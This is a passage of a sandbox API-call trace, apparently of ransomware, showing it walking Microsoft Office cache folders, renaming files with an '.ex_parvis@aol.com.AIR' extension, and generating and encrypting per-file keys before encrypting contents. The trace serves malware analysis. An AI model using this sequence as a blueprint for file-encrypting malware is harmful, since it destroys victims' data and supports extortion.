	[0102.463] WriteFile (in: hFile=0x500, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0102.463] WriteFile (in: hFile=0x500, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0102.464] ReadFile (in: hFile=0x500, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x1416b54, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x1416b54, lpOverlapped=0x0) returned 1
	[0103.680] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xdc25e030, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xdc25e030, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dabf0
	[0103.681] FindNextFileW (in: hFindFile=0x5dabf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xdc25e030, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xdc25e030, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0103.681] FindNextFileW (in: hFindFile=0x5dabf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a35700, ftCreationTime.dwHighDateTime=0x1cac9d7, ftLastAccessTime.dwLowDateTime=0x6a35700, ftLastAccessTime.dwHighDateTime=0x1cac9d7, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1a588, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dwintl20.dll", cAlternateFileName="")) returned 1
	[0103.681] FindNextFileW (in: hFindFile=0x5dabf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xdc25e030, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xdc25e030, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xdc25e030, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0103.681] FindNextFileW (in: hFindFile=0x5dabf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xdc25e030, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xdc25e030, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xdc25e030, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0103.681] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0103.682] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0103.682] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll", dwFileAttributes=0x80) returned 1
	[0103.690] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 81
	[0103.690] GetProcessHeap () returned 0x540000
	[0103.690] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x108) returned 0x598b60
	[0103.690] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll"
	[0103.690] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll.12781717671972518758.ex_parvis@aol.com.AIR"
	[0103.690] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0103.700] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc
	[0103.700] GetProcessHeap () returned 0x540000
	[0103.700] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0103.700] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=107912) returned 1
	[0103.700] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x1a588
	[0103.700] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0103.700] GetProcessHeap () returned 0x540000
	[0103.700] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0103.700] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0103.701] WriteFile (in: hFile=0x1fc, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0103.702] WriteFile (in: hFile=0x1fc, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0103.702] WriteFile (in: hFile=0x1fc, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0103.703] ReadFile (in: hFile=0x1fc, lpBuffer=0x607bb8, nNumberOfBytesToRead=0x1a588, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x607bb8*, lpNumberOfBytesRead=0x3a1f778*=0x1a588, lpOverlapped=0x0) returned 1
	[0103.706] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xdd05a170, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xdd05a170, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dac30
	[0103.706] FindNextFileW (in: hFindFile=0x5dac30, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xdd05a170, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xdd05a170, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0103.706] FindNextFileW (in: hFindFile=0x5dac30, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa623330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x266a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AccessMUI.msi", cAlternateFileName="ACCESS~1.MSI")) returned 1
	[0103.706] FindNextFileW (in: hFindFile=0x5dac30, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa5fe940, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x545, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AccessMUI.xml", cAlternateFileName="ACCESS~1.XML")) returned 1
	[0103.706] FindNextFileW (in: hFindFile=0x5dac30, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3216e900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3216e900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa64a430, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1ab7e94, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AccLR.cab", cAlternateFileName="")) returned 1
	[0103.706] FindNextFileW (in: hFindFile=0x5dac30, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11e8ef00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x11e8ef00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xfc0c60c0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x91975, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="branding.xml", cAlternateFileName="")) returned 1
	[0103.706] FindNextFileW (in: hFindFile=0x5dac30, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xdd05a170, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xdd05a170, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xdd05a170, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0103.706] FindNextFileW (in: hFindFile=0x5dac30, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xdd05a170, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xdd05a170, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xdd05a170, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0103.706] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0103.706] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0103.706] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", dwFileAttributes=0x80) returned 1
	[0103.707] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 89
	[0103.707] GetProcessHeap () returned 0x540000
	[0103.707] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x118) returned 0x57fb28
	[0103.707] lstrcpyW (in: lpString1=0x57fb28, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml"
	[0103.707] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.12781717671972518758.ex_parvis@aol.com.AIR"
	[0103.707] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0103.709] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200
	[0103.709] GetProcessHeap () returned 0x540000
	[0103.709] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x57fb28 | out: hHeap=0x540000) returned 1
	[0103.709] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=596341) returned 1
	[0103.709] SetFilePointer (in: hFile=0x200, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x91975
	[0103.709] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0103.709] GetProcessHeap () returned 0x540000
	[0103.709] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0103.709] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0103.711] WriteFile (in: hFile=0x200, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0103.713] WriteFile (in: hFile=0x200, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0103.714] WriteFile (in: hFile=0x200, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0103.714] ReadFile (in: hFile=0x200, lpBuffer=0x460020, nNumberOfBytesToRead=0x91975, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x460020*, lpNumberOfBytesRead=0x3a1f778*=0x91975, lpOverlapped=0x0) returned 1
	[0103.737] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0103.737] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0103.737] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab", dwFileAttributes=0x80) returned 1
	[0103.738] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 86
	[0103.738] GetProcessHeap () returned 0x540000
	[0103.738] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x112) returned 0x57fb28
	[0103.738] lstrcpyW (in: lpString1=0x57fb28, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab"
	[0103.738] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.12781717671972518758.ex_parvis@aol.com.AIR"
	[0103.738] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0103.740] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200
	[0103.740] GetProcessHeap () returned 0x540000
	[0103.740] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x57fb28 | out: hHeap=0x540000) returned 1
	[0103.740] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=28016276) returned 1
	[0103.740] SetFilePointer (in: hFile=0x200, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x1ab7e94
	[0103.741] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0103.741] GetProcessHeap () returned 0x540000
	[0103.741] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0103.741] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0103.741] WriteFile (in: hFile=0x200, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0103.743] WriteFile (in: hFile=0x200, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0103.743] WriteFile (in: hFile=0x200, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0103.743] ReadFile (in: hFile=0x200, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x1ab7e94, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x1ab7e94, lpOverlapped=0x0) returned 1
	[0105.475] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0105.475] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0105.475] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", dwFileAttributes=0x80) returned 1
	[0105.476] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 90
	[0105.476] GetProcessHeap () returned 0x540000
	[0105.476] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x11a) returned 0x57fb28
	[0105.476] lstrcpyW (in: lpString1=0x57fb28, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml"
	[0105.476] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR"
	[0105.476] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0105.479] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200
	[0105.479] GetProcessHeap () returned 0x540000
	[0105.479] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x57fb28 | out: hHeap=0x540000) returned 1
	[0105.479] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=1349) returned 1
	[0105.479] SetFilePointer (in: hFile=0x200, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x545
